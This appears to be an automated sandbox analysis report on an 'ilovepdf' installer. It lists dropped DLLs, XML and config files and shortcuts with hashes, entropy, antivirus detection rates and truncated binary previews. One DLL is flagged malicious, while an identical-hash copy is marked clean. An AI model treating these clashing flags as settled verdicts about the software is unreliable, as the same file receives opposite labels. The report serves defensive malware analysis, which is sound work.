                                                                                  MD5:57694C4A03C977B96DF390DE8C5D1FE2
                                                                                  SHA1:41DF5F6423C637D1B27EDEE5CB966AB5F9EF7415
                                                                                  SHA-256:C9D6544A89762E7E8EFF3A3D6F47D744AEF72B01D6A7F1D3607F86D701B226BA
                                                                                  SHA-512:555B382E03121461E5B110D2CB72F3B072A492C386E25DC1CBC726035E4566945AE0F93D2355B318A8CC71CDBBEF5F45DC49EFCA6FCD21865B3BD369A9BA270D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>....<language>.. <Set Index="1" text="English">.. <txt BtnID="1">Add</txt>.. <txt BtnID="2">Remove</txt>.. <txt BtnID="3">Clear</txt>.. <txt BtnID="4">Open Folder</txt>.. <txt BtnID="5">File Name</txt>.. <txt BtnID="6">Size</txt>.. <txt BtnID="7">Total Pages</txt>.. <txt BtnID="8">Selected Pages</txt>.. <txt BtnID="9">Status</txt>.. <txt BtnID="10">Home</txt>.. <txt BtnID="11">Settings</txt>.. <txt BtnID="12">Convert</txt>.. <txt BtnID="13">Word</txt>.. <txt BtnID="14">Image</txt>.. <txt BtnID="15">Text</txt>.. <txt BtnID="16">HTML</txt>.... <txt BtnID="17">Language</txt>.. <txt BtnID="18">Save Path</txt>.. <txt BtnID="19">Image Format</txt>.. <txt BtnID="20">Word Format</txt>.. <txt BtnID="21">Default</txt>.. <txt BtnID="22">Select</txt>.. <txt BtnID="23">Save</txt>.... <txt BtnID="24">Please add at least one PDF file.</txt>.. <txt BtnID="25">Output Format:</txt>.... <t
                                                                                  C:\Program Files (x86)\ilovepdf\is-TSARV.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):484
                                                                                  Entropy (8bit):3.262742514495205
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:fI+PciIrJRFWEXoPcZ0qLJxpPcZ0qm/LVpPcZ0qHJxpPcZ0qc/8Xn+PcoINJRFOy:pSJRRBNaE/LsBa+/G1JREovn
                                                                                  MD5:147C02BD59F90777A43F77C711145711
                                                                                  SHA1:299BC5A77CF4BB06FE123F70FC1EC643ECA6FCC2
                                                                                  SHA-256:F7077388D0CC1928FA1759C91A5396D87D282A78843F1330456FB3809C2E12FA
                                                                                  SHA-512:7A274D979C67437C9CD4148C85C7FBC62D2DEFF26E730158D93F3EBF3B89A070A415305DC708FBE9991EF0BB0C870D13518887E17DCF937C54A7F6AFF83A8D97
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: #-------------------2021-10-11 19:01:13-------------------#program start..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary th.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary ti.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tt.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tw.dll Error:126..#-------------------2021-10-11 19:01:17-------------------#program end..
                                                                                  C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):924672
                                                                                  Entropy (8bit):7.929559685251935
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:GEg1DE1gGL9ZK4c/hNXZwPruWXXIKPw5:GE0E1gk3UVGPr/XdY
                                                                                  MD5:9CCAD979D2030F7BB09CFE8CDC174D8D
                                                                                  SHA1:EF047862787F0C5F813D2ECBB9106F751FB6B6C8
                                                                                  SHA-256:EACDDCAE0D5FD7613164A4BD4852280903A1E374CBA7D1A8DAA2369AB953BA13
                                                                                  SHA-512:D54C01F5390DBA87C559BC269B192B80C6BB75D222AD30DC21014EEA2815EB686ED9A4819C44BB60F8BC8F5943D782F7A5D9CFA59BC395343C67368DD4D0A680
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............g...g...g...o...g..`o...g...D...g...o...g..`o...g...g..re..mp...g..mp..=g..mp...g...F...g...k...g...C..wg...C...g...k...g..mp...g..mp...g...l...g..mp...g..Rich.g..................PE..L..._.H...........!......... ........#.......#...............................#.......................................#.....L.#.......#.L.....................#.................................................................@...................UPX0....................................UPX1................................@....rsrc.... ....#.....................@......................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\is-VCRNI.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):288
                                                                                  Entropy (8bit):4.155730210419504
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iNofEsshqwofAhd/2vWOZCvRSaubS8JvObSyo8du:i6fdso9wl2vhZ+RSdOYmO78du
                                                                                  MD5:B5D5DA176844BFE5FA47A1727E7CB8BC
                                                                                  SHA1:A7B7EE512E6DBC46603CD7830152C69D39D2CACB
                                                                                  SHA-256:FC0D68DD98F86BEA1B9699424FCE2C5F747E31419451404E9A9B83ED13394D42
                                                                                  SHA-512:BC1A5D218DA9D6BE1CACF237C522D98190C76C946A080F3555B94217EBA112A1995D3AB4710D605937171C3A7D85B28FA874C699B00EB367BACC6E5241CA5503
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <UserDefine>.. <Language ID="0" />.. <Path PathSet="2" Path="" />.. <ImageFormat set="2" />.. <Res set="96" />.. <bit set="24" />.. <Prefix set="" />.. <Doc set="1" />.. <Help set="1" />.. </UserDefine>..</config>..
                                                                                  C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 9%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L...".".".'...".'....".'...".>.!.".>.'.".>.&."....".#..".&.+.".&.".".&..."...".&. .".Rich..".................PE..L.....da...........!................. ....................................................@..........................$......x%..(....p..................................8...................D...........@............................................text.../........................... ..`.rdata...[.......\..................@..@.data...<....0....... ..............@....tls.........P.......(..............@....gfids.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc...............0..............@..B........................................................................................................................................................................................................
                                                                                  C:\Program Files (x86)\ilovepdf\language.xml (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):86057
                                                                                  Entropy (8bit):5.650674653880301
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RxBKLWBVtFt475GbZj30O7CXBCZSCfo4nfKTbvAbFTggiHdtz2SkZSvNc/YM/tdI:R7e2wlTbYbF24iZFazDIMv9AV
                                                                                  MD5:57694C4A03C977B96DF390DE8C5D1FE2
                                                                                  SHA1:41DF5F6423C637D1B27EDEE5CB966AB5F9EF7415
                                                                                  SHA-256:C9D6544A89762E7E8EFF3A3D6F47D744AEF72B01D6A7F1D3607F86D701B226BA
                                                                                  SHA-512:555B382E03121461E5B110D2CB72F3B072A492C386E25DC1CBC726035E4566945AE0F93D2355B318A8CC71CDBBEF5F45DC49EFCA6FCD21865B3BD369A9BA270D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>....<language>.. <Set Index="1" text="English">.. <txt BtnID="1">Add</txt>.. <txt BtnID="2">Remove</txt>.. <txt BtnID="3">Clear</txt>.. <txt BtnID="4">Open Folder</txt>.. <txt BtnID="5">File Name</txt>.. <txt BtnID="6">Size</txt>.. <txt BtnID="7">Total Pages</txt>.. <txt BtnID="8">Selected Pages</txt>.. <txt BtnID="9">Status</txt>.. <txt BtnID="10">Home</txt>.. <txt BtnID="11">Settings</txt>.. <txt BtnID="12">Convert</txt>.. <txt BtnID="13">Word</txt>.. <txt BtnID="14">Image</txt>.. <txt BtnID="15">Text</txt>.. <txt BtnID="16">HTML</txt>.... <txt BtnID="17">Language</txt>.. <txt BtnID="18">Save Path</txt>.. <txt BtnID="19">Image Format</txt>.. <txt BtnID="20">Word Format</txt>.. <txt BtnID="21">Default</txt>.. <txt BtnID="22">Select</txt>.. <txt BtnID="23">Save</txt>.... <txt BtnID="24">Please add at least one PDF file.</txt>.. <txt BtnID="25">Output Format:</txt>.... <t
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dat (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):571917
                                                                                  Entropy (8bit):7.966052994665358
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/HegB06gEPizUsFEjR79m3qMkrnkIClgWoZmGjKo2Dt5psSjd:/+i06g8oUsFElpm3dw1ClFrg2Dt59d
                                                                                  MD5:BDE9F29D164449ADA1DF3BECD54E4337
                                                                                  SHA1:F104C62DE429CF02A3DFEE203122BD6FDE88B1F3
                                                                                  SHA-256:634DD50A6002D5E328D595E04C16B88D351AB7577C25C8FA674420D9BB57D896
                                                                                  SHA-512:7AA0B7E47DFA4FE25E9FF613865AE35DA00D6651BDA27A6B4F7DD30E6A6ABFB66B5BD2C7C9A5C9871DBBCE30CAA24CE885C3650DC2D860A60E09D33113449C25
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ....Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L...".".".'...".'....".'...".>.!.".>.'.".>.&."....".#..".&.+.".&.".".&..."...".&. .".Rich..".................PE..L.....da...........!................. ....................................................@..........................$......x%..(....p..................................8...................D...........@............................................text.../........................... ..`.rdata...[.......\..................@..@.data...<....0....... ..............@....tls.........P.......(..............@....gfids.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc...............0..............@..B........................................................................................................................................................................................................
                                                                                  C:\Program Files (x86)\ilovepdf\th.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):924672
                                                                                  Entropy (8bit):7.929559685251935
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:GEg1DE1gGL9ZK4c/hNXZwPruWXXIKPw5:GE0E1gk3UVGPr/XdY
                                                                                  MD5:9CCAD979D2030F7BB09CFE8CDC174D8D
                                                                                  SHA1:EF047862787F0C5F813D2ECBB9106F751FB6B6C8
                                                                                  SHA-256:EACDDCAE0D5FD7613164A4BD4852280903A1E374CBA7D1A8DAA2369AB953BA13
                                                                                  SHA-512:D54C01F5390DBA87C559BC269B192B80C6BB75D222AD30DC21014EEA2815EB686ED9A4819C44BB60F8BC8F5943D782F7A5D9CFA59BC395343C67368DD4D0A680
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............g...g...g...o...g..`o...g...D...g...o...g..`o...g...g..re..mp...g..mp..=g..mp...g...F...g...k...g...C..wg...C...g...k...g..mp...g..mp...g...l...g..mp...g..Rich.g..................PE..L..._.H...........!......... ........#.......#...............................#.......................................#.....L.#.......#.L.....................#.................................................................@...................UPX0....................................UPX1................................@....rsrc.... ....#.....................@......................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\ti.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):706560
                                                                                  Entropy (8bit):7.921985342568425
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:h+7aMyDxl1EputZ69u+sC4pdFANpBnNw7AMoFg8gb+CdofxMtauAjAMmyEDYHg36:hrVl1EpsZqQdSNpBnW7tPJeAlDYIqpv
                                                                                  MD5:19C9680AC9642A8105096ED9C1C5C71C
                                                                                  SHA1:1B4D55F5D372AB0E7532E2F4613BA1B767B4AC80
                                                                                  SHA-256:ABBFC12837B138DA3DC66D5D6032D1183FC947FBEEC22DF0EC71B6120FC1B769
                                                                                  SHA-512:2BCE8C3F3260E28D0B807C7EB1C1B271904FE45AE2D5366C47F6C72C13E070D40E1D5C6C00D37967DA0C33E3408CFDF6F23AFAC3975C8817030CF90F9355DC55
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./,.4kM.gkM.gkM.g]k.giM.g.Q.gaM.gkM.giM.g.R.giM.g.Q.gcM.g.R.goM.g.R.giM.gmn.g.M.gkM.g.M.g.B.gxM.g]k.g.M.g]k.g.M.g.K.gjM.g.m.gjM.gRichkM.g........PE..L...I..I...........!.........P.......... ..............................................................................A.................................t.......................................................................................UPX0....................................UPX1......... ...~..................@....rsrc....P.......F..................@..............................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\tt.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):921600
                                                                                  Entropy (8bit):7.929650404687928
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:9MIjKyNtCBdD3dMJ5QXWdWN2n3ROQ94EnNyYSsjHGHTnFha3sIvx7D+IE4uBwL8i:9fCXdwQGh74EniLHa3z5eaLo0L9K
                                                                                  MD5:814EF2BDB0199A7B950E3ECB650E9E29
                                                                                  SHA1:89460EE7A16E6682721E1C59D194DFBE05D35FD1
                                                                                  SHA-256:6F7D45E4ABEE103049E50E8BF9AB3E36B9C0D5044FDAB3B1B37766017ED5E4DF
                                                                                  SHA-512:90E082F14F677CC7C34D7F71623E9C86084E714F288F941C6603CE63DD2AA28A6B16959E5B3E9F849BFC0A82A6F8F9AC5F7D64E28AF310E373BF8ADD3610281E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............g...g...g...o...g..`o...g...D...g...o...g..`o...g...g..re..mp...g..mp..=g..mp...g...F...g...k...g...C..wg...C...g...k...g..mp...g..mp...g...l...g..mp...g..Rich.g..................PE..L...".H...........!......... ......`.#.......#...............................#.......................................#.....$.#.......#.$.....................#.............................................................(~..@...................UPX0....................................UPX1................................@....rsrc.... ....#.....................@......................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):1209344
                                                                                  Entropy (8bit):7.922981354856275
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ngTRboPdLcaUHa3XRIXmpTpoCenCZjMRHIpU8OKhT6ZbKoD97ST5S0LX/68cBDk:nuo1LcFis8pSgUR4CuI97sS07/Nww
                                                                                  MD5:B4BFDBB19C4E1A089F51577D193A9F42
                                                                                  SHA1:3E6B4C547289BD39A84CD7A73A8FCFDF72C0C442
                                                                                  SHA-256:8549924223C77E4C52EC83E4BC2845FA9F7C571934423C27CA0D4BFED0EEB451
                                                                                  SHA-512:0D85E0AC1D65A92083523C32F275BBF40D1380B608551DACFA41037691FCE230FF1D6AF3E3B263BCC274D7C935581B0328563627A9D7EBFDE14B6E85F56416B4
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W!.c.@n0.@n0.@n0...0.@n04..0)@n0.O10.@n0.O30.@n0.@o0"Bn04..0.@n04..0.An04..0.An04..0.@n04..0.@n04..0.@n0Rich.@n0........PE..L....h.N...........!.............. ..z2... ...2..............................@3...........@..........................2.....(.2.......2.(...................t03......................................|2.H...........................................UPX0...... .............................UPX1.......... .....................@....rsrc.........2.....................@......................................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\unins000.dat
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2951
                                                                                  Entropy (8bit):3.4119433710230496
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:kxe5dyXdKrCy7d/didKdnudSdpUdjdVdQdtdVdNrCyrrCy4gNmMxeUhiwM4:kMuSCCRfCwCtJMHhiwM4
                                                                                  MD5:011C210BE28283E0C800446501515FF0
                                                                                  SHA1:11006311AD1D2E9A2F91EB5B946D390B7D435DFF
                                                                                  SHA-256:0AEE628B7EEEED16D39E22EB2B7CDEFDD2D9EAC7EDC83288AC3B805A71069BB3
                                                                                  SHA-512:AE15B20C9747045568920A09C5BDE0966D23EE94DD74F717A0D731D2196D283CFC1BCF1DE40FE77AA6A225800595D7B2CA6B634B075D88B480D35934841BD75D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: Inno Setup Uninstall Log (b)....................................{2CC7E4CF-1FD3-4C8C-8740-AB78A9B0E5D1}..........................................................................................ilovepdf....................................................................................................................................................................................................................................................7......D.............y........5.2.8.1.1.0......h.a.r.d.z......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f................1...... ........................C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f......C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.(.D.e.f.a.u.l.t.)......(.D.e.f.a.u.l.t.)......d.e.f.a.u.l.t.............D........C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f........r........C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.
                                                                                  C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3038269
                                                                                  Entropy (8bit):6.3798753919324795
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:nLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu/:FwSi0b67zeCzt0+yO3kSs
                                                                                  MD5:F6783D6BAD48D0F022DDB2C0A5819087
                                                                                  SHA1:FD1E4D2EBCC11D98ADAA75797527BA7E8DA5DC59
                                                                                  SHA-256:DAFBDF676A506C8743F4A93E81C927075101A172CBB8B3E8BCCF867D4D270B2B
                                                                                  SHA-512:67C53D7F3A0190E7A9B3FAD2B6E404EF7E0D67536210561B23F98C16C3EA4E4CEFEC8FF475FE318AA5C7466554E349ED5A6E5897576520A490346E7DAF02800A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...p.._.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...P.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                  C:\Program Files (x86)\ilovepdf\update.xml (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):178
                                                                                  Entropy (8bit):5.200654239805503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cFfdXP+FFFKMlFsPR4GXXyWRXlQFSLKbFUuAvF9IZZDKh+sWGXViKWVV9uMv:iV2FFFKMfsp7i22SLKbFUPvYWhpBFiZz
                                                                                  MD5:23872B81B308F0615E32E9EC60B8F806
                                                                                  SHA1:3989CA350F25FA4703573AD07AFBE99DECA43C98
                                                                                  SHA-256:BC528E642062193291745A32FFDF899BF420F556562BF18774B67615DF2A56E2
                                                                                  SHA-512:6357529877B355F724D390117FE19250344B7322098476D30F50D59381956345189E26DCB6618E610F0755C4C9819CAAC5D1323C82F3936FA028D7F3198C3A20
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <current Dat="1351852478" />.. <Dat Txt="&#x0A;What&apos;s New: We are waiting for your feedbacks -&gt; ||&#x0A;http://unipdf.com/support/&#x0A;" />..</config>..
                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnk
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 24 18:49:17 2021, mtime=Sun Oct 24 18:49:20 2021, atime=Tue Dec 24 17:25:50 2019, length=2613752, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):1092
                                                                                  Entropy (8bit):4.61575992669859
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8moUlzDUAcdOE7YPAzs8/dQqdgUUxDb7X7aB6m:8m3lQBdOrYYWdQqdV2b7mB6
                                                                                  MD5:E861D577008E1B9FEBCE77EF300048EA
                                                                                  SHA1:05FD7622DD8D3D71032EE7C506D34FC71FC9EFAA
                                                                                  SHA-256:1D24C9137FF7F9C6DEB8099F0BD4890FB65F4950FE867DFD29754CB3672AA7F1
                                                                                  SHA-512:8C8E6679A594E6881C45A06BAFE2EB33B7847E095284638BF3BD6D793DA4F0DCC4E5786E21817F6911E5154C1C33EE546955CF13395AC1ACD41A38FC103DBBD8
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: L..................F.... ......:....szn<......e.......'..........................P.O. .:i.....+00.../C:\.....................1.....7Sxy..PROGRA~2.........L.XS......................V.....&*,.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....Z.1.....XS,...ilovepdf..B......XS).XS,.....h.........................i.l.o.v.e.p.d.f.....f.2...'..O9. .ilovepdf.exe..J......XS).XS+...............................i.l.o.v.e.p.d.f...e.x.e.......[...............-.......Z...........C........C:\Program Files (x86)\ilovepdf\ilovepdf.exe..8.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.\.i.l.o.v.e.p.d.f...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.........*................@Z|...K.J.........`.......X.......528110...........!a..%.H.VZAj...R..M..........-..!a..%.H.VZAj...R..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6
                                                                                  C:\Users\Public\Desktop\ilovepdf.lnk
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 24 18:49:17 2021, mtime=Sun Oct 24 18:49:20 2021, atime=Tue Dec 24 17:25:50 2019, length=2613752, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):1080
                                                                                  Entropy (8bit):4.614976573469123
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8moUlzb+dOE7YPAzs8VdQqdgUUxDb7X7aB6m:8m3lb+dOrYYsdQqdV2b7mB6
                                                                                  MD5:4638B21A3E7FB47447EEC7FF96EB791B
                                                                                  SHA1:BB4D6C396116A23EC05C19305FF275C78C59D075
                                                                                  SHA-256:CE219A1BB80D87F8B08F4EAB99D1B5EE74F20A708D29B3AE85E953A460BF1156
                                                                                  SHA-512:5560E3769B53429DFA8F65839F0B26434B75876D74A851B68762E916FB744F3CB77B3EF2F11068C5B22A59B5F763414EA9C2F550BEE2E749AB8CE411C822C151
                                                                                  Malicious:false
                                                                                  Reputation:unknown
